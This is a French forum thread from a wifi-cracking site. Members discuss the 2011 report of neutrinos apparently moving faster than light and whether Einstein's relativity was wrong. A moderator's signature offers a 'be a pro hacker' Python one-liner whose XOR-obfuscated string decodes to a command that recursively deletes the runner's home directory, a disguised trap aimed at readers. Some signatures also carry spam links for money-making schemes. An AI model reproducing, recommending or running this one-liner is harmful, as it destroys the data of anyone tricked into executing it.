Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 23-09-2011 19:16:01

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Einstein s'est il planté ???

Plop les loulous,

dyn003_original_298_371_pjpeg_2544267_463cca8e1a0b2bab8b93ec50e5345c18.jpg

Petit rappel pour ceux qui ne le savent pas.

La théorie de la relativité restreinte repose entre autre sur un postulat qui prédit qu'aucune particule ou objet possédant une masse ne peut se déplacer plus vite que la vitesse de la lumière.
Bien que depuis longtemps on postulait pour l'existence de particules nommées 'tachyos" qui se déplaceraient plus vite que la lumière.
En partant du principe qu'elles étaient dépourvues de masse. Comme on croyait aussi que les (neutrinos en étaient dépourvus)

Une équipe de chercheurs vient apparemment de prouver le contraire en ayant flashé des neutrinos (dont on n'était pas sur au début qu'ils possédaient une masse je le rappel) se déplaçant plus vite que la lumière.

L'expérience à été vérifié une première fois, mais va devoir être confirmée.
Cela prendra encore un certain temps.

La question qui se posera alors sera de savoir si Einstein s'est trompé ou non.

Pesonnellement, je ne pense pas qu'il se soit trompé à proprement parler, mais plutôt qu'il n'avait pas une vison globale des choses faute de moyens.
J'ai toujours pensé que ses théories n'étaient pas exclusives dans le sens ou elles seraient sans doute ammenées à évoluer et à se compléter avec le temps.
Elle reflètent ce que l'on pouvait et que l'on peut observer avec les moyens dont on dispose.

Partant de ce principe, pour ma part, je pense que les théories d'Einstein ne sont donc pas figées et que si certains aspects seront à revoir à l'avenir (ce qui est sur).
Elles devront englober une partie de ses théories, comme le siennes ont englobées une partie des théories de Newton.

On ne peut donc pas parler d'erreur de mon point de vue.

Bref je trouve que c'est une découverte passionnante, j'ai vraiment hâte d'en savoir plus .....

Article : Une particule qui se déplace plus vite qu’à la vitesse de la lumière

[Source:] vincentabry.com

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 23-09-2011 19:39:38

vances1
Membre Indispensable
Site Web

Re : Einstein s'est il planté ???

Vraiment interessant

si ces particules voyagent plus vite que la lumière, cela signifie qu’elles ont réussi à trouver un chemin plus rapide, pourquoi pas dans une autre dimension. La cinquième dimension (en plus de la largeur-longueur-hauteur (3D) et du temps)

Par contre Einstein semblait parler de vide et apparemment les "neutrinos" observé semble avoir traversé l’écorce terrestre, ce qui semble encore plus incroyable car même au niveau atomique cela devrais offrir un maximum de collision.

On est de toute façons bien loin de tout savoir smile

Gagner de l'argent en Bourse https://www.youtube.com/watch?v=mq96BGWfE4U
Travailler à domicile Sondage rémunéré http://www.avis-sondages.fr/
Méthode et solution pour gagner de l'argent sur internet http://www.methodeargent.net/

#3 23-09-2011 19:44:39

noireaude
Membre d'honneur
Site Web

Oui en effet.
Mais le fait qu'il n'y ait pas énormément de collision venait du postulat que leur très petite taille prédisait qu'ils pourraient traverser très longtemps de la matière (il avaient pris l'exemple du plomb) avant de heutrer un noyeau d'atome.

C'est pour cela qu'apparemment il y aurait peu de collisions.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#4 23-09-2011 19:52:09

vances1
Membre Indispensable
Site Web

Il vas nous falloir plus d'info, tu aime nous laisser sur notre faim big_smile

Gagner de l'argent en Bourse https://www.youtube.com/watch?v=mq96BGWfE4U
Travailler à domicile Sondage rémunéré http://www.avis-sondages.fr/
Méthode et solution pour gagner de l'argent sur internet http://www.methodeargent.net/

#5 23-09-2011 20:19:17

noireaude
Membre d'honneur
Site Web

Faut déjà attendre la confirmation par une autre équipe, mais les conséquences dans le cas ou c'est avéré seraient énormes.

Personne en a encore parlé mais si les particules peuvent voyager plus vite que la lumière et qu'on puisse le mettre en oeuvre à l'echelle macroscopique.
Ca aurait pour conséquence de vivre d'un un monde ou l'effet précèderait la cause. Génial non lol

#6 24-09-2011 02:49:47

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Ca aurait pour conséquence de vivre d'un un monde ou l'effet précèderait la cause. Génial non lol

Et bien voila un moyen de cracker le WPA en deux secondes smile

Pour revenir à ton sujet Noireaude, je ne pense pas, comme toi, qu'Albert s'est planté. Cette théorie a été prouvé et vérifier sous toute ses formes, chaque particule possédant une masse ne peut aller plus vite que la lumière, et le Nutrino en a une, certes très très faible, mais elle n'est pas nulle.

Pour cette découverte, je crois que les physiciens devront réfléchir sans pour autant violer des principes et des lois sur lesquels sont fondé des certitudes acquises depuis longtemps, et qui sont la base d'autres théories révolutionnaires. Par exemple, il existe en mécanique quantique ce que les physiciens appellent (des variables cachées) qui ne fait d'ailleurs pas l'unanimité chez tous les physiciens, mais dont Einstein été un défenseur.

En fait, ces variables sont une nouvelle mécanique dans la mécanique quantique permettant de comprendre une réalité plus fondamentale de ce qu'elle permet la mécanique quantique. Car si il serait possible d’aller plus vite que la vitesse de la lumière, comment expliquer aussi le phénomène des paire EPR selon lesquelles deux particules reste dans le même état quantique et le moindre changement dans une particule se répercute instantanément sur l’autre, même si elles sont séparées par des années lumière !

#7 24-09-2011 10:32:28

spawn
Modérateur

Mmh. à ces échelles la, les notions de vitesse et de masse que nous connaissons n'existent plus.

J'ai demandé un jour à un physicien conférencier de passage dans ma prépa ce qu'est la masse.
C'est un des 200 types qui se baladent autour du monde de Berkeley au CERN en passant par Oxford en parlant de physique quantique.
Eh bien, à ces échelles là, il a fait des gestes avec ses mains pour expliquer qu'il y a plusieurs phases de masse et que l'on peut se trouver dans l'une ou dans l'autre.. bref, c'est super technique.

Suite à la découverte, j'ai cherché un peu et je suis très vite tombé sur des papers expliquant que ce qui a été mesuré sort des théories actuelles, et que cela forme une sorte d'exception à la théorie.

Théorie != règle. Depuis newton, on a du ajouter une dimension à l'univers pour que le GPS fonctionne.
(eh oui, ce n'est pas de la triangulation mais de la 'quadrangulation'. (c'est BEAUCOUP plus compliqué à expliquer)

Et ce que les astrophysiciens découvrent loin dans l'espace se recoupe avec ce que les physisicens des particules trouvent sous terre, il nous manque encore des dimensions. Pas facile comme concept.
Ce qui explique qu'il faille, comme toujours, vendre des livres 'Le Temps n'existe PAS !!' et construire de nouvelles hypothèses, les vérifier, les confronter à des résultats (comme les neutrinos) ect, ect..

C'est la science qu change de point de vue, et pas le monde qui évolue. [en plus ca rime !]

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#8 24-09-2011 20:13:45

noireaude
Membre d'honneur
Site Web

Fuji a écrit :

Et bien voila un moyen de cracker le WPA en deux secondes smile

Pour revenir à ton sujet Noireaude, je ne pense pas, comme toi, qu'Albert s'est planté. Cette théorie a été prouvé et vérifier sous toute ses formes, chaque particule possédant une masse ne peut aller plus vite que la lumière, et le Nutrino en a une, certes très très faible, mais elle n'est pas nulle.

Pour cette découverte, je crois que les physiciens devront réfléchir sans pour autant violer des principes et des lois sur lesquels sont fondé des certitudes acquises depuis longtemps, et qui sont la base d'autres théories révolutionnaires. Par exemple, il existe en mécanique quantique ce que les physiciens appellent (des variables cachées) qui ne fait d'ailleurs pas l'unanimité chez tous les physiciens, mais dont Einstein été un défenseur.

En fait, ces variables sont une nouvelle mécanique dans la mécanique quantique permettant de comprendre une réalité plus fondamentale de ce qu'elle permet la mécanique quantique. Car si il serait possible d’aller plus vite que la vitesse de la lumière, comment expliquer aussi le phénomène des paire EPR selon lesquelles deux particules reste dans le même état quantique et le moindre changement dans une particule se répercute instantanément sur l’autre, même si elles sont séparées par des années lumière !

Tu m'as mal lu ou mal compris fuji je suis entièrement d'accord avec toi.
Je ne pense pas qu'il se soit trompé (quoi que sur le point précis du "rien de ce qui possède une masse ne peut aller plus vite que a lumière apparemment si.)

Pour le reste je pense comme toi, ses théories sont certainements justes sur pas mal de points mais demandent à être complétées.
Comme il l'a fait lui même avec celle de Newtion..

#9 24-09-2011 20:19:13

noireaude
Membre d'honneur
Site Web

spawn a écrit :

Théorie != règle. Depuis newton, on a du ajouter une dimension à l'univers pour que le GPS fonctionne.
(eh oui, ce n'est pas de la triangulation mais de la 'quadrangulation'. (c'est BEAUCOUP plus compliqué à expliquer)

C'est compliqué à expliquer on a juste ajouté la dimension temporelle. Et découvert qu'il fallait remettre à l'heure régulièrement les GPS, car le temps ne s'écoule pas à la même vitesse partout lol

Annonce